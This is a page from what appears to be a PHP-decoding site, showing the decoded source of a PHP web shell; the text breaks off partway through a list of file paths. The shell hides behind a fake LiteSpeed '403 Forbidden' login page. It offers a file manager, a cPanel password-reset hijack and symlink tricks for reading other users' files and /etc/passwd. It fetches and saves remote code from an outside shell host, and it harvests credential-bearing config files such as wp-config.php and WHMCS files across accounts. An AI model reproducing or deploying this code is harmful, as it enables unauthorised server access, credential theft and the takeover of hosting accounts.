Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); @set_time_limit(0); @clearstatcache(); @ini_set('errors_lo..
Decoded Output download
<?php
session_start();
@set_time_limit(0);
@clearstatcache();
@ini_set('errors_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$fnct = "fu"."nc"."tion"."_exi"."sts";
$fxt = "fi"."le_"."exis"."ts";
$igt = "in"."i_g"."et";
$disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");
if (empty($disfunc)) {
$disf = "<font color='#df5'>NONE</font>";
} else {
$disf = "<font color='red'>".$disfunc."</font>";
}
/*configuration */
/* Password Using md5 hashes */
$password = "f7fd6b2ad149e39221471c30924028ee";
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
function login_shell()
{
?>
<!DOCTYPE html>
<html style="height:100%">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title> 403 Forbidden
</title></head>
<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
<h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
<h2 style="margin-top:20px;font-size: 30px;">Forbidden
</h2>
<p>Access to this resource on the server is denied!</p><style>input{margin:0;background-color:#fff;border:1px solid #fff}</style><pre align="center"><form method="post"><input name="pass"type="password"></form></pre></body></html>
</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}
function Rootpath() {
return $_SERVER['DOCUMENT_ROOT'];
}
function HitungFileSize($Size) {
if ($Size < 1024) {
return $Size . " byte" ;
} else if ($Size < 1024 * 1024) {
$Hasil = round($Size / 1024,2) ;
return $Hasil . " KB" ;
} else if ($Size < 1024 * 1024 * 1024) {
$Hasil = round($Size / 1024 / 1024,2) ;
return $Hasil . " MB" ;
} else if ($Size < 1024 * 1024 * 1024 * 1024) {
$Hasil = round($Size / 1024 / 1024 / 1024,2) ;
return $Hasil . " GB" ;
}
}
function BersihkanPath($Path) {
$Char = substr($Path,0,1);
if ($Char === "/") {
$Path = substr ($Path,1);
}
return $Path;
}
function AmbilParentFolder ($Path) {
$array = explode("/", $Path);
$parent = null;
$i=0;
while($i < (count($array) - 1)) {
$parent .= "/" . $array [$i] ;
$i += 1 ;
}
return BersihkanPath($parent);
}
function ScanFolder($Path) {
$LinkFile = NULL;
$IsiTable = NULL;
$TableFolder = NULL;
$TableFile = Null;
if (isset($_GET["p"]) === TRUE) {
if ($_GET["p"] === "") {
} else {
$LinkFile .= $_GET["p"];
$Path .= "/" . $_GET["p"];
}
$ListFile = scandir($Path);
} else {
$ListFile = scandir($Path);
}
foreach ($ListFile as $File) {
if ($File === '.') {
//Tidak Ada Perintah Di Eksekusi
} elseif ($File === '..') {
if ($Path === Rootpath()) {
// Kalau sama dengan RootPath, Dilewatin aja
} else {
$IsiTable = '<tr>
<td><a href="?p='.AmbilParentFolder($_GET["p"]).'" class="text-decoration-none text-reset"><i class="bi bi-arrow-90deg-left"></i> ..</a></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>';
}
} else {
$FilePath = $Path . "/". $File;
if (filetype($FilePath) == 'dir') {
$TableFolder .= '<tr>
<td><a href="?p='.BersihkanPath($LinkFile . "/" . $File).'" class="text-decoration-none text-reset"><i class="bi bi-folder"></i> '.$File.'</a></td>
<td>Folder</td>
<td>'.date ("d F Y H:i:s", filemtime($FilePath)).'</td>
<td>'.decoct(fileperms($FilePath) & 0777).'</td>
<td>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Renaming" data-bs-toggle="tooltip" title="Rename" id="RenameButton" data-id="'.$File.'">
<i class="bi bi-pencil-square"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#ModifyTime" data-bs-toggle="tooltip" title="ModifyTime" id="ModifyTime" data-id="'.$File.'">
<i class="bi bi-clock-fill"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Delete" data-bs-toggle="tooltip" title="Delete" id="DeleteButton" data-id="'.$File.'" data-type="Folder">
<i class="bi bi-trash3"></i></button>
</td>
</tr>';
} else {
$TableFile .= '<tr>
<td><i class="bi bi-file-earmark"></i> '.$File.'</td>
<td>'.HitungFileSize(filesize($FilePath)).'</td>
<td>'.date ("d F Y H:i:s", filemtime($FilePath)).'</td>
<td>'.decoct(fileperms($FilePath) & 0777).'</td>
<td>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Renaming" data-bs-toggle="tooltip" title="Rename" id="RenameButton" data-id="'.$File.'">
<i class="bi bi-pencil-square"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#EditFile" data-bs-toggle="tooltip" title="EditFile" id="EditFileButton" data-id="'.$fedit.'" data-type="Folder">
<i class="bi bi-file-earmark"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#ModifyTime" data-bs-toggle="tooltip" title="ModifyTime" id="ModifyTime" data-id="'.$File.'">
<i class="bi bi-clock-fill"></i></button>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Chmod" data-bs-toggle="tooltip" title="Chmod" id="ChmodButton" data-id="'.$File.'" data-type="Folder">
<i class="bi bi-person-fill"></i></button>
<a href="?DL='.$File.'" class="text-decoration-none text-reset"><button type="button" class="btn btn-light" data-bs-toggle="tooltip" title="Download">
<i class="bi bi-download"></i></button></a>
<button type="button" class="btn btn-light" data-bs-toggle="modal"
data-bs-target="#Delete" data-bs-toggle="tooltip" title="Delete" id="DeleteButton" data-id="'.$File.'" data-type="File">
<i class="bi bi-trash3"></i></button>
</td>
</tr>';
}
}
}
$IsiTable .= $TableFolder . $TableFile ;
return $IsiTable ;
}
function NgisiBreadCrumb() {
if (isset($_GET["p"])) {
if ($_GET["p"] == "") {
} else {
$array = explode("/", $_GET["p"]);
$parent = null;
$i=0;
$isiBreadCrumb = null;
while($i < (count($array))) {
$parent .= "/" . $array [$i] ;
$parent = BersihkanPath($parent);
$isiBreadCrumb .= '<li class="breadcrumb-item"><a href="?p='.$parent.'" class="text-decoration-none text-reset" >'.$array [$i].'</a></li>' ;
$i += 1 ;
}
return $isiBreadCrumb;
}
}
}
function Pathing () {
$Root = Rootpath();
$PosisiSekarang = getcwd();
$Path = null;
$PosisiSekarang = str_replace("\","/",$PosisiSekarang);
$ArrayRoot = explode("/",$Root) ;
$ArrayPosisi = explode("/",$PosisiSekarang) ;
$i = count($ArrayPosisi) ;
while ($i > count($ArrayRoot)) {
$Path .= "../";
$i -= 1 ;
}
if (isset($_GET["p"])) {
$Path .= $_GET["p"] ;
}
$Path .= "/";
return $Path ;
}
function DeleteFolder($Path) {
$ListFile = scandir($Path);
foreach ($ListFile as $File) {
$FilePath = $Path . "/". $File;
if($File == "." or $File == "..") {
}else {
if (filetype($FilePath) == 'dir') {
DeleteFolder($FilePath) ;
} else {
unlink($FilePath);
}
}
}
rmdir($Path) ;
}
function DownloadFile () {
if (isset($_GET["DL"])) {
$filename = Pathing() . $_GET["DL"] ;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header("Cache-Control: no-cache, must-revalidate");
header("Expires: 0");
header('Content-Disposition: attachment; filename="'.basename($filename).'"');
header('Content-Length: ' . filesize($filename));
header('Pragma: public');
}
}
function ButtonAction() {
if(isset($_POST["submit"])) {
$action = $_POST["action"];
if ($action == "Upload File") {
$target_dir = Pathing();
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);
} else if ($action == "New File") {
$NamaFile = $_POST["NamaFile"];
$myfile = fopen(Pathing() . $NamaFile, "w") ;
} else if ($action == "New Folder") {
$NamaFolder = $_POST["NamaFolder"];
mkdir(Pathing() . $NamaFolder);
} else if ($action == "Rename") {
$OldName = $_POST["OldName"];
$NewName = $_POST["NewName"];
rename(Pathing() . $OldName, Pathing() . $NewName) ;
} else if ($action == "Delete") {
$Namaitem = $_POST["NamaItem"];
$Type = $_POST["Type"];
if ($Type == "File") {
unlink(Pathing(). $Namaitem);
} else {
DeleteFolder(Pathing(). $Namaitem);
}
}
}
}
/*
Cpanel Crack
*/
if ($_GET['aksi'] == 'resetpasscp') {
echo '<br/><center><h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5><center>
<form method="POST">
<div class="form-group">
<center><input type="email" name="email" class="form-control" placeholder="Masukan Email..."/></center><br/>
<center><input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/><center>
</div>
</form>';
if(isset($_POST['submit'])){
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');
$email = $_POST['email'];
$wr = 'email:'.$email;
$f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$f = fopen('/home/'.$user.'/.contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$parm = $site.':2082/resetpass?start=1';
echo '<br/>Url: '.$parm.'';
echo '<br/>Username: '.$user.'';
echo '<br/>Success Reset To: '.$email.'<br/><br/>';
}
exit;
}
/*
Adminer
*/
if($_GET['aksi'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
} else {
if(adminer("https://www.adminer.org/static/download/4.8.1/adminer-4.8.1.php","adminer.php")) {
echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
} else {
echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
}
}
exit;
}
/*
Symlink
*/
if($_GET['aksi'] == 'symlink') {
if(!is_file('named.txt')){
$d00m = @file("/etc/named.conf");
}else{
$d00m = @file("named.txt");
}
if(!$d00m) {
die ("[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
}
else{
echo "[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<div class='tmp'>
<table align='center' width='100%'>
<thead class='bg-info'>
<th>Domains</th>
<th>Users</th>
<th>symlink </th>
</thead>";
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
flush();
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
flush();
$site = $user['name'] ;
@symlink("/","sym/root");
$site = $domsws[1][0];
$ir = 'ir';
$il = 'il';
if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
$site = ".$domsws[1][0].";
}
echo "
<tr>
<td>
<a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
</td>
<td>
".$user['name']."
</td>
<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
</td>
</tr>";
flush();
flush();
}
}
}
echo "</table>
</div><br/>";
}
exit;
}
if($_GET['aksi'] == 'symread') {
echo "read /etc/named.conf";
echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
flush();
$file = '/etc/named.conf';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}else if (!$r3ad) {
$r3ad = @show_source($file) ;
}else if (!$r3ad) {
$r3ad = @highlight_file($file);
}else if (!$r3ad) {
$sm = @symlink($file,'sym.txt');
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
}
echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
if(isset($_GET['save'])){
$cont = stripcslashes($_POST['file']);
$f = fopen('named.txt','w');
$w = fwrite($f,$cont);
if($w){
echo '<br/>save has been successfully';
}
fclose($f);
}
exit;
}
if ($_GET['aksi'] == 'sym_404'){
echo '<h2>Symlink 404</h2>
<form method="post">
File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
<input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
</form>';
if($_POST['execute']){
rmdir("gds_sym404");
mkdir("gds_sym404", 0777);
$dir = $_POST['dir'];
$isi = $_POST['isi'];
system("ln -s ".$dir."gds_sym404/".$isi);
symlink($dir,"gds_sym404/".$isi);
$inija = fopen("gds_sym404/.htaccess", "w");
fwrite($inija,"ReadmeName ".$isi."
Options Indexes FollowSymLinks
DirectoryIndex ids.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any");
echo'<a href="/gds_sym404/" target="_blank"> >>Sukses<< </a>';
}
exit;
}
if ($_GET['aksi'] == 'sym_bypas'){
if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
$cont = stripcslashes($_POST['file']);
if(!file_exists('passwd.txt')){
$f = @fopen('passwd.txt','w');
$w = @fwrite($f,$cont);
fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
echo "<div class='tmp mb-4'>
<table width='100%'>
<thead class='bg-info text-center'>
<th>Users</th>
<th>symlink</th>
<th>FTP</th>
</thead>";
flush();
$fil3 = file('passwd.txt');
foreach ($fil3 as $f){
$u=explode(':', $f);
$user = $u['0'];
echo "<tr class='text-dark'>
<td class='text-left pl-1'>$user</td>
<td>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>
<td>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>
</tr>";
flush();
flush();
}
die ("</tr></table></div>");
}
}
echo "read /etc/passwd";
echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
$file = '/etc/passwd';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}elseif(!$r3ad) {
$r3ad = @show_source($file) ;
}elseif(!$r3ad) {
$r3ad = @highlight_file($file);
}elseif(!$r3ad) {
for($uid=0;$uid<1000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "
";
}
}
}
flush();
echo "</textarea><br/>
<input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
</form>";
flush();
exit;
}
if($_GET['aksi'] == 'symread') {
echo "read /etc/named.conf";
echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
<textarea class='form-control' rows='8' name='file'>";
flush();
flush();
$file = '/etc/named.conf';
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}else if (!$r3ad) {
$r3ad = @show_source($file) ;
}else if (!$r3ad) {
$r3ad = @highlight_file($file);
}else if (!$r3ad) {
$sm = @symlink($file,'sym.txt');
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
}
echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
if(isset($_GET['save'])){
$cont = stripcslashes($_POST['file']);
$f = fopen('named.txt','w');
$w = fwrite($f,$cont);
if($w){
echo '<br/>save has been successfully';
}
fclose($f);
}
exit;
}
if ($_GET['aksi'] == 'bypascf') {
echo '<form method="POST"><br>
<div class="form-group input-group">
<select class="form-control" name="idsPilih">
<option>Pilih Metode</option>
<option>ftp</option>
<option>direct-conntect</option>
<option>Webmail</option>
<option>Cpanel</option>
</select>
</div>
<div class="form-group input-group">
<input class="form-control" type="text" name="target" placeholder="Masukan Url">
<input class="btn btn-danger form-control" type="submit" value="Bypass">
</div><br>
</form>';
$target = $_POST['target'];
# Bypass From FTP
if($_POST['idsPilih'] == "ftp") {
$ftp = gethostbyname("ftp."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
}
# Bypass From Direct-Connect
if($_POST['idsPilih'] == "direct-conntect") {
$direct = gethostbyname("direct-connect."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
}
# Bypass From Webmail
if($_POST['idsPilih'] == "webmail") {
$web = gethostbyname("webmail."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
}
# Bypass From Cpanel
if($_POST['idsPilih'] == "cpanel") {
$cpanel = gethostbyname("cpanel."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
}
exit;
}
/*
bypass403
*/
if($_GET['aksi'] == 'bypass403') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function bypass403($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('bypass403.php')) {
echo "<center><a href='$full/bypass403.php' target='_blank'>-> bypass403 <-</a></font></center><br/>";
} else {
if(bypass403("https://shell.prinsh.com/Nathan/bypass403.txt","bypass.php")) {
echo "<center><a href='$full/bypass403.php' target='_blank'>-> bypass403 <-</a></font></center><br/>";
} else {
echo "<center><font color=red>gagal buat bypass403</font></center><br/>";
}
}
exit;
}
/*
Config
*/
if($_GET['aksi'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
$con = mkdir("gds_config", 0777);
$isi_htc = "Options all
Require None
Satisfy Any";
$htc = fopen("gds_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_con) {
$user_config_dir = "/home/$user_con/public_html/";
if(is_readable($user_config_dir)) {
$grab_config =
[
"/home/$user_con/.my.cnf" => "cpanel",
"/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_con/public_html/forum/config.php" => "phpBB",
"/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_con/public_html/app/etc/local.xml" => "Magento",
"/home/$user_con/public_html/admin/config.php" => "OpenCart",
"/home/$user_con/public_html/application/config/database.php" => "Ellislab",
"/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
"/home/$user_con/public_html/inc/config.php" => "MyBB",
"/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
"/home/$user_con/public_html/inc/conf_global.php" => "IPB",
"/home/$user_con/public_html/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
"/home/$user_con/public_html/configuration.php" => "Joomla",
"/home/$user_con/public_html/blog/configuration.php" => "Joomla",
"/home/$user_con/public_html/submitticket.php" => "^WHMCS",
"/home/$user_con/public_html/cms/configuration.php" => "Joomla",
"/home/$user_con/public_html/beta/configuration.php" => "Joomla",
"/home/$user_con/public_html/portal/configuration.php" => "Joomla",
"/home/$user_con/public_html/site/configuration.php" => "Joomla",
"/home/$user_con/public_html/main/configuration.php" => "Joomla",
"/home/$user_con/public_html/home/configuration.php" => "Joomla",
"/home/$user_con/public_html/demo/configuration.php" => "Joomla",
"/home/$user_con/public_html/test/configuration.php" => "Joomla",
"/home/$user_con/public_html/v1/configuration.php" => "Joomla",
"/home/$user_con/public_html/v2/configuration.php" => "Joomla",
"/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_con/public_html/new/configuration.php" => "Joomla",
"/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
"/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
